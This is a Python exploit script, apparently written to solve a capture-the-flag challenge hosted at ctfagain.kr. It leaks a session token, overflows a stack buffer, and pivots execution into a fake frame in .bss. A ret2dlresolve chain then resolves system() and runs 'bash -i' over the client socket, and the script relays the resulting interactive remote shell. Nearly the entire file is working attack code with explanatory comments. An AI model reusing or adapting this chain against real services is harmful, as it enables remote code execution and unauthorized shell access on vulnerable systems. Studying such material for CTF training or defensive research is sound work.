from socket import *
import struct
import time
import sys
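# ---------------------------------------------------------------------------
# Stage-1 payload: fake Elf32_Rel + fake Elf32_Sym + "system\0" string, laid out
# in the target's .bss so the dynamic linker resolves our fake symbol when the
# fake relocation is fed to it (a ret2dlresolve-style chain), followed by a fake
# stack frame that the stage-0 pivot lands on.
#
# All addresses are hard-coded absolutes, so this only works against a binary
# loaded at its link-time base (non-PIE) with these exact section offsets.
# ---------------------------------------------------------------------------
buffer = 0x804B028  # writable .bss scratch area the payload is received into (shadows the py2 builtin; name kept for callers)
target = 0x804B00C  # GOT slot (commented as memcpy) used as r_offset of the fake Elf32_Rel
dynstr = 0x80483EC  # .dynstr base: st_name below is an offset relative to this
lr = 0x8048B9A      # return address placed after the stage-0 call (presumably a leave;ret-style epilogue that pivots esp to ebp_path -- confirm against the binary)


def p(x):
    """Pack *x* as a 4-byte little-endian unsigned int (Elf32_Addr / Elf32_Word)."""
    return struct.pack("<L", x)


def ph(x):
    """Pack *x* as 4 little-endian bytes.

    NOTE: despite the name this is NOT an Elf32_Half (2 bytes). The 2-byte
    overshoot is load-bearing: it pushes the "system\\0" string to offset 38,
    which is exactly what the st_name field below points at. Switching this to
    "<H" would require changing that +38 to +36.
    """
    return struct.pack("<I", x)


def pb(x):
    """Pack *x* as a single byte."""
    return struct.pack("<B", x)


def log(x):
    """Write *x* plus a newline to stderr (not used in this file; kept for callers)."""
    sys.stderr.write(x + "\n")


# Fake Elf32_Rel: r_offset = GOT slot to patch, r_info = (symidx << 8) | 7
# (7 == R_386_JMP_SLOT). symidx is chosen so that 0x80481CC + symidx * 16
# (16 == sizeof(Elf32_Sym)) == buffer + 20, i.e. the fake Elf32_Sym assembled
# below. 0x80481CC is presumably the .dynsym base -- confirm against the binary.
# Floor division is required: under Python 3 "/" yields a float and struct.pack
# rejects it (the original relied on Python 2 integer division).
symidx = (buffer - 0x80481CC + 18 + 16) // 16  # == 743 -> symbol at buffer + 20
rel = p(target) + p((symidx << 8) | 7)

s = socket(AF_INET, SOCK_STREAM)  # connected later, once the payload is built

# Fake Elf32_Sym at buffer+20 (offsets in brackets are into `payload`).
head = b"".join([
    rel,                          # [0..8)    fake Elf32_Rel
    b"A" * (20 - len(rel)),       # [8..20)   padding up to the symbol
    p(buffer - dynstr + 38),      # [20..24)  st_name: dynstr + st_name == buffer + 38 == the "system" string
    p(0xff),                      # [24..28)  st_value -- original note: "writable int, isn't it?"; value looks arbitrary, confirm
    p(0xff),                      # [28..32)  st_size
    pb(0xf0),                     # [32]      st_info
    pb(0xc0),                     # [33]      st_other -- original note says "must be 0"; 0xc0 leaves the low (visibility) bits clear, which is presumably what matters
    ph(0xffff),                   # [34..38)  st_shndx, but 4 bytes wide (see ph) so the string lands at 38
    b"system\x00",                # [38..45)  symbol name the dynamic linker will look up
    p(0xC0DECAFE),                # [45..49)  original note: "len(payload) - overwritten" -- placeholder clobbered at runtime, confirm
    p(buffer),                    # [49..53)
    b"A" * 1000,                  # [53..1053) filler up to the fake frame
])

# Stage 0 overwrites the saved ebp with this address; the pivot then pops the
# fake ebp below and "returns" into the fake frame.
ebp_path = buffer + len(head)

# Fake frame the pivot lands on. The layout (PLT stub address, relocation
# argument, return address, then arguments) is consistent with invoking the
# resolver on our fake Elf32_Rel and landing in system("bash ...") -- confirm
# the two hard-coded addresses against the binary.
frame = b"".join([
    p(0xC0DECAFE),                # popped as ebp by the pivot; never dereferenced
    p(0x80488EB),                 # return target: presumably the `jmp PLT0` inside a PLT stub
    p(buffer - 0x8048624),        # reloc_arg: offset of the fake Elf32_Rel (buffer+0) from the presumed .rel.plt base 0x8048624
    p(0xC0DECAFE),                # return address for the resolved function (not meant to be reached)
])
cmd = b"bash -i <&4 >&4 2>&4"    # fd 4 is assumed to be the client socket on the server side
cmd_addr = ebp_path + len(frame) + 8  # skips the two pointer slots that follow the frame
frame += b"".join([
    p(cmd_addr),                  # arg1: pointer to the command string right after this frame
    p(buffer),                    # arg2 (unused by system())
    cmd,                          # NOTE: no NUL terminator -- relies on the byte after it in .bss being 0
])

payload = head + frame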
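# ---------------------------------------------------------------------------
# Network interaction: leak a token, use it to reach the "launch" path, send the
# stage-0 overflow that pulls `payload` into .bss, then relay an interactive
# shell. Written to run on Python 2 or 3: every wire value is bytes and stdout/
# stdin are used at the byte layer where Python 3 exposes one.
# ---------------------------------------------------------------------------
def _recv_at_least(sock, n, bufsize=1024):
    """Read from *sock* until at least *n* bytes have arrived or the peer closes.

    TCP does not preserve message boundaries, so a single recv() may return only
    a prefix of the server's reply; the token parse below indexes past a fixed
    0x200 + 30 byte echo and needs all of it present. Returns everything read,
    possibly more than *n*.
    """
    data = b""
    while len(data) < n:
        chunk = sock.recv(bufsize)
        if not chunk:
            break  # peer closed; caller must cope with a short result
        data += chunk
    return data


def _show(data):
    """Dump raw server bytes to stdout followed by a newline (Python 2 and 3)."""
    out = getattr(sys.stdout, "buffer", sys.stdout)
    out.write(data + b"\n")
    out.flush()


s.connect(("ctfagain.kr", 7003))
_show(s.recv(1024))                                   # banner
s.sendall(b"target")                                  # sendall: plain send() may transmit only part of the buffer
_show(s.recv(1024))
s.sendall(("%d/%d" % (0x1010101, 0x1010101)).encode("ascii"))
_show(s.recv(1024))
_show(s.recv(1024))

# Memory leak: an oversized input is echoed back followed by whatever sits after
# it in the server's buffer; the token starts 0x200 + 30 bytes into the reply.
LEAK_PREFIX = 0x200 + 30
s.sendall(b"a" * 0x200)
token = _recv_at_least(s, LEAK_PREFIX + 1)[LEAK_PREFIX:]
_show(b"============== exploit: token get")
_show(token)
if len(token) < 2:
    # Without a token the rest of the chain cannot succeed; fail loudly instead
    # of sending an empty string and waiting on a dead session.
    log("token leak failed: %d byte(s) after the echo" % len(token))
    s.close()
    sys.exit(1)

s.sendall(b"launch")
_show(s.recv(1024))
s.sendall(token[:-1])                                 # drop the trailing byte (assumed to be the newline)
time.sleep(0.01)
_show(s.recv(1024))
_show(s.recv(1024))

# Stage 0: overflow the 524-byte frame on the "launch" path. The saved ebp is
# replaced by ebp_path so a later leave;ret-style epilogue (presumably what lr
# points at) pivots esp onto the fake frame inside `payload`; the return address
# becomes 0x80488E0 called with (4, buffer, len(payload), 0), which looks like
# recv(4, buffer, len, 0) pulling `payload` into .bss -- confirm both addresses
# against the binary.
stage0 = b"".join([
    b"A" * 524,
    p(ebp_path),
    p(0x80488E0),
    p(lr),
    p(4),
    p(buffer),
    p(len(payload)),
    p(0),
])
s.sendall(stage0)
s.sendall(payload)   # NOTE: no delay between the two sends, as in the original; relies on the server reading stage0 first
_show(s.recv(1024))
time.sleep(0.01)

# Interactive relay: stdin lines -> socket, socket -> stdout, until EOF on either
# side. The original raw_input() loop died with an uncaught EOFError and never
# closed the socket.
_stdin = getattr(sys.stdin, "buffer", sys.stdin)
_stdout = getattr(sys.stdout, "buffer", sys.stdout)
try:
    while True:
        line = _stdin.readline()
        if not line:
            break                                     # EOF on stdin
        s.sendall(line.rstrip(b"\r\n") + b"\n")
        reply = s.recv(102400)
        if not reply:
            break                                     # peer closed the shell
        _stdout.write(reply)
        _stdout.flush()
except KeyboardInterrupt:
    pass
finally:
    s.close()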